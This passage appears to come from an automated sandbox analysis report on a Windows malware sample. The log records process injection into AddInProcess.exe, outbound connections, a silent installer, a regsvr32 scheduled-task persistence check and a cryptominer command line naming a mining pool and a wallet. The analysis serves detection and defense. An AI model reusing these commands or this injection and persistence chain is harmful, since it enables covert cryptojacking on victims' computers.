          Source: Stamp_Setup.tmp, 0000000A.00000002.2223623641.00000000005EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yKr
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: regsvr32.exe, 0000000E.00000003.3031881382.000000001B66E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 140.82.121.4 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.88.203.169 39001Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.199.110.133 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread register set: target process: 6860Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread register set: target process: 6744Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread register set: target process: 1060Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: D6E6314010Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: E7D1259010Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 5D09F5F010Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhostJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENTJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
